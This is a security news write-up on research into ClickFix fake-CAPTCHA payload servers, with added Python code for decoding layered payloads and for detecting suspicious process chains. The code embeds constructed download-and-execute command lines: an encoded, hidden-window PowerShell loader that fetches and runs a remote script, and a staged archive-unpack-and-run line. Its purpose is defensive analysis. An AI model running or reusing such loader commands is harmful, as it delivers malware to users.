Security researcher Bert-Jan Pals analyzed roughly 3,000 live ClickFix payloads and presented findings at OrangeCon in early June, publishing details on June 30. ClickFix is a social engineering technique where fake CAPTCHA or error pages trick users into copying and running malicious commands manually, bypassing traditional antivirus and endpoint controls.
Pals discovered that ClickFix payloads are now produced by API-driven backend servers that act as on-demand services. These servers check access tokens, log callers, and return freshly scrambled commands each time. One server returned 100 different payloads wrapped in rotating obfuscation methods including Base64, AES, TripleDES, Rijndael, and Deflate. The platform serves lures in 25 languages and matches commands to the visitor’s operating system, including macOS and Windows.
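The rotating wrappers described above are what an analyst has to strip before the command can be read. As an added example (not code from Pals' research or from the article), the Python helper below peels the non-keyed layers a ClickFix one-liner commonly stacks: a Base64-encoded UTF-16LE `-EncodedCommand`, then a Base64 blob fed to a .NET `DeflateStream`. The two wrapping stubs and the `example.invalid` URL in the sample are constructed for this example in the style of common PowerShell loaders; the real payload formats are not reproduced on the page. Keyed layers (AES, TripleDES, Rijndael) need the key that the stub carries and are deliberately left where the loop stops.

```python
"""Peel Base64 / UTF-16LE / Deflate layers off a PowerShell one-liner.

Added example, not from the research or the article. The sample payload built by
build_sample() is constructed; real ClickFix payloads may differ in shape.
"""
import base64
import re
import zlib

# A run of 40+ Base64 characters that is not part of a longer token.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{40,}={0,2})(?![A-Za-z0-9+/=])")


def _printable(s):
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def _bytes_to_text(data):
    """Return (text, encoding) if data reads as UTF-8 or UTF-16LE text, else None."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            continue
        if _printable(text):
            return text, enc
    return None


def _inflate(data):
    """Try raw Deflate (what .NET DeflateStream emits), then zlib/gzip (wbits 47)."""
    for wbits in (-15, 47):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            pass
    return None


def peel_layers(command, max_layers=8):
    """Return (innermost_text, layer_labels).

    Each round decodes the longest Base64 blob in the current text; if the result
    is readable text the loop continues with it, otherwise it tries to inflate it.
    The loop stops at a keyed or unknown layer rather than guessing.
    """
    text, layers = command, []
    for _ in range(max_layers):
        blobs = B64_RE.findall(text)
        if not blobs:
            break
        try:
            raw = base64.b64decode(max(blobs, key=len), validate=True)
        except ValueError:
            break
        decoded = _bytes_to_text(raw)
        if decoded:
            text = decoded[0]
            layers.append("base64+" + decoded[1])
            continue
        inflated = _inflate(raw)
        decoded = _bytes_to_text(inflated) if inflated else None
        if not decoded:
            break  # keyed (AES/3DES/Rijndael) or unrecognised layer: stop here
        text = decoded[0]
        layers.append("base64+deflate+" + decoded[1])
    return text, layers


# Constructed innermost command; example.invalid is a reserved, non-resolving name.
INNER = r"Invoke-WebRequest https://example.invalid/stage2.ps1 -OutFile $env:TEMP\stage2.ps1; & $env:TEMP\stage2.ps1"


def build_sample():
    """Wrap INNER in Deflate+Base64 inside a DeflateStream stub, then UTF-16LE+Base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw Deflate, no zlib header
    deflated = comp.compress(INNER.encode()) + comp.flush()
    stub = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
            "[IO.MemoryStream][Convert]::FromBase64String('%s'), "
            "[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::UTF8)).ReadToEnd()"
            % base64.b64encode(deflated).decode())
    encoded = base64.b64encode(stub.encode("utf-16-le")).decode()
    return "powershell -nop -w hidden -EncodedCommand " + encoded


if __name__ == "__main__":
    final, labels = peel_layers(build_sample())
    print(" -> ".join(labels))
    print(final)
```

The blob-length floor of 40 characters keeps short identifiers such as `FromBase64String` from being mistaken for payload, and text is tried before inflation because a UTF-16LE string also happens to start with bytes that raw Deflate would reject.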
The research also revealed a new delivery method designed to evade Windows' Anti-Malware Scan Interface (AMSI). Instead of placing a malicious command on the clipboard directly, the newer pages copy a harmless-looking orchestrator line that moves a previously downloaded file out of the Downloads folder, unpacks it, and runs the script inside. The pasted line itself contains only file-handling commands, so there is no malicious script content for AMSI to inspect when the user runs it; the malicious code arrives separately as the downloaded file.
ClickFix has been adopted by state-backed groups including APT28, MuddyWater, and Kimsuky, and has spawned variants like FileFix and DownloadFix. ESET measured a 517% increase in ClickFix usage from late 2024 into early 2025, and Microsoft's 2025 Digital Defense Report attributed 47% of initial-access cases to ClickFix. The technique has its own MITRE ATT&CK entry, T1204.004 (User Execution: Malicious Copy and Paste).
Defenders are advised to monitor process chains such as explorer.exe (which hosts the Win+R Run dialog that ClickFix lures commonly direct victims to) or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe that then open outbound network connections. Behavioral EDR, application-control rules, and user guidance remain key defenses. Pals listed three payload servers: comicstar[.]lat, babybon[.]cfd, and merkantalolol[.]asia.
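The process-chain guidance above, together with the Downloads-folder orchestrator described earlier, can be turned into a concrete detection. The Python below is an added example (not from Pals' research or the article) that runs the rule over Sysmon-like process-creation and network-connection events. The event schema, the sample events, the `203.0.113.0/24` addresses and the file paths are constructed for this example; the Downloads-plus-unpack command-line heuristic is an assumption about how such an orchestrator line looks, since the page does not reproduce the real one.

```python
"""Flag ClickFix-style process chains in Sysmon-like process and network telemetry.

Added example, not from the research or the article. The event schema, the sample
events and the orchestrator heuristic below are constructed for illustration.
"""
import ntpath
import re
from dataclasses import dataclass, field

# Parents that indicate a user-pasted command: the Win+R Run dialog and Start menu
# are hosted by explorer.exe; terminal sessions spawn from WindowsTerminal.exe.
LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
# Interpreters named in the article as the children to watch.
INTERPRETERS = {"powershell.exe", "cmd.exe", "msiexec.exe"}

# Assumed shape of the AMSI-evading orchestrator line: it references the user's
# Downloads folder together with a move/unpack verb. Constructed heuristic; the
# page does not reproduce the real line.
DOWNLOADS_RE = re.compile(r"\\downloads\\", re.IGNORECASE)
STAGE_RE = re.compile(r"\b(expand-archive|move-item|copy-item|tar|move|copy)\b", re.IGNORECASE)


@dataclass
class Alert:
    pid: int
    parent: str
    image: str
    reasons: list = field(default_factory=list)


def _base(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def detect_clickfix(events):
    """Return one Alert per suspicious process.

    events is an iterable of dicts in a Sysmon-like shape:
      event_id 1: {"pid", "image", "parent_image", "command_line"}  (process create)
      event_id 3: {"pid", "dest_ip", "dest_port"}                    (network connect)
    A launcher -> interpreter chain is alerted when that process later connects out
    and/or its command line stages a file from the Downloads folder.
    """
    procs = {e["pid"]: e for e in events if e["event_id"] == 1}
    net_pids = {e["pid"] for e in events if e["event_id"] == 3}
    alerts = []
    for pid, proc in procs.items():
        image, parent = _base(proc["image"]), _base(proc["parent_image"])
        if image not in INTERPRETERS or parent not in LAUNCHERS:
            continue
        reasons = []
        if pid in net_pids:
            reasons.append("launcher->interpreter with outbound connection")
        cmd = proc.get("command_line", "")
        if DOWNLOADS_RE.search(cmd) and STAGE_RE.search(cmd):
            reasons.append("command line stages a file from Downloads")
        if reasons:
            alerts.append(Alert(pid, parent, image, reasons))
    return alerts


# Constructed sample telemetry: one ClickFix-style paste, one msiexec launch from
# Windows Terminal, and two benign look-alikes that must not alert.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 100, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "explorer.exe"},
    # Pasted orchestrator (constructed): stages an archive from Downloads and runs it.
    {"event_id": 1, "pid": 200, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell -w hidden -c "Move-Item $env:USERPROFILE\Downloads\fix.zip '
                     r'$env:TEMP; Expand-Archive $env:TEMP\fix.zip $env:TEMP\fix; & $env:TEMP\fix\run.ps1"'},
    {"event_id": 3, "pid": 200, "dest_ip": "203.0.113.10", "dest_port": 443},
    # Benign: Get-Date typed into the Run dialog, no network activity.
    {"event_id": 1, "pid": 300, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell Get-Date"},
    # Benign: an editor spawning cmd.exe that connects out; the parent is not a launcher.
    {"event_id": 1, "pid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Editor\editor.exe",
     "command_line": "cmd.exe /c npm install"},
    {"event_id": 3, "pid": 400, "dest_ip": "203.0.113.20", "dest_port": 443},
    # msiexec launched from Windows Terminal that then connects out.
    {"event_id": 1, "pid": 500, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Program Files\WindowsTerminal\WindowsTerminal.exe",
     "command_line": "msiexec /i https://203.0.113.30/pkg.msi /qn"},
    {"event_id": 3, "pid": 500, "dest_ip": "203.0.113.30", "dest_port": 443},
]

if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(f"pid {a.pid}: {a.parent} -> {a.image}: {'; '.join(a.reasons)}")
```

Requiring the launcher parent keeps ordinary developer tooling (an editor spawning cmd.exe that fetches packages) out of the alert stream, while a Run-dialog PowerShell that never touches the network or the Downloads folder is also left alone; tune the two reason checks to the telemetry your EDR actually emits.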
CVEs: CVE-2026-20245
Attack groups: APT28, MuddyWater, Kimsuky
Malware: ClickFix, ClearFake, FileFix, DownloadFix
Companies: ESET, Microsoft, Proofpoint, Expel
Products: Windows Defender, AMSI
Events: OrangeCon
Original source: thehackernews.com